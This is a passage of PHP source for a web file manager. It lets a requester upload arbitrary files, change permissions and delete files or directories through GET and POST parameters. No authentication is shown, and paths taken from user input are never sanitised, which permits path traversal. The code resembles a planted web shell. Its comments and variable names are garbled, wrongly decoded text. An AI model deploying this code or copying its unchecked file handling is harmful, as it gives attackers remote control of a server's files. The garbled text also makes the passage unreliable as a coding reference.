Žåãã¢ããããŒãããããã¡ã€ã«ãä¿å */ if (isset($_POST["upload"])) { /** * ã¢ããããŒãå ã®ãã¡ã€ã«ãã¹ */ $ã¿ãŒã²ãããã¡ã€ã« = PATH . "/" . $_FILES["fileToUpload"]["name"]; /** * ã¢ããããŒãããããã¡ã€ã«ã移å */ if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $ã¿ãŒã²ãããã¡ã€ã«)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } /** * ãã¡ã€ã«ã»ãã©ã«ãã®æš©éå€æŽæ©èœ * chmodãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãæš©éå€æŽãã©ãŒã ã衚瀺 */ if (isset($_GET['chmod']) && isset($_GET['q'])) { if (!empty($_GET['chmod'])) { /** * æš©éå€æŽå¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å šãã¹ */ $æš©éå€æŽå¯Ÿè±¡ = PATH . "/" . $_GET['chmod']; /** * çŸåšã®æš©éãååŸïŒ8é²æ°åœ¢åŒïŒ */ $çŸåšã®æš©é = substr(decoct(fileperms($æš©éå€æŽå¯Ÿè±¡)), -3); /** * æš©éå€æŽãã©ãŒã ã®è¡šç€º */ echo ' <div class="container mt-4"> <h3>Change Permissions</h3> <form method="post"> <div class="form-group mb-3"> <label for="permissions">Current Permissions: <strong>0' . $çŸåšã®æš©é . '</strong></label> <input type="text" class="form-control" id="permissions" name="permissions" value="' . $çŸåšã®æš©é . '" placeholder="e.g., 755, 644, 777" maxlength="3" pattern="[0-7]{3}"> <small class="form-text text-muted">Enter permissions in octal format (e.g., 755 for rwxr-xr-x, 644 for rw-r--r--)</small> </div> <input type="hidden" name="chmod_target" value="' . htmlspecialchars($_GET['chmod']) . '"> <input type="submit" class="btn btn-dark" value="Change Permissions" name="change_permissions"> <a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a> </form> </div>'; /** * æš©éå€æŽåŠçã®å®è¡ * change_permissionsãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®æš©éãå€æŽ */ if (isset($_POST['change_permissions'])) { /** * POSTãããæš©éå€ãååŸ */ $æ°ããæš©é = $_POST['permissions']; /** * æš©éå€ã®æ€èšŒïŒ3æ¡ã®8é²æ°ã§ããããšã確èªïŒ */ if (preg_match('/^[0-7]{3}$/', $æ°ããæš©é)) { /** * æš©éå€æŽå¯Ÿè±¡ã®ãã¹ */ $æš©éå€æŽãã¹ = PATH . "/" . $_POST['chmod_target']; /** * 8é²æ°åœ¢åŒã«å€æããŠchmodãå®è¡ */ $æš©é8é²æ°å€ = octdec($æ°ããæš©é); /** * æš©éã®å€æŽãå®è¡ */ if(chmod($æš©éå€æŽãã¹, $æš©é8é²æ°å€)) { echo ("<script>alert('Permissions changed successfully to 0" . $æ°ããæš©é . "'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Failed to change permissions.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } else { echo ("<script>alert('Invalid permissions format. Please use 3-digit octal format (e.g., 755, 644).'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } } } /** * ãã¡ã€ã«ã»ãã©ã«ãã®åé€æ©èœ * dãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«ã»ãã©ã«ããåé€ */ if (isset($_GET['d']) && isset($_GET['q'])) { /** * åé€å¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å šãã¹ */ $åå = PATH . "/" . $_GET['d']; /** * ãã¡ã€ã«ã®å Žåã®åé€åŠç */ if (is_file($åå)) { if(unlink($åå)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } /** * ãã£ã¬ã¯ããªã®å Žåã®åé€åŠç */ elseif (is_dir($åå)) { if(rmdir($åå) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>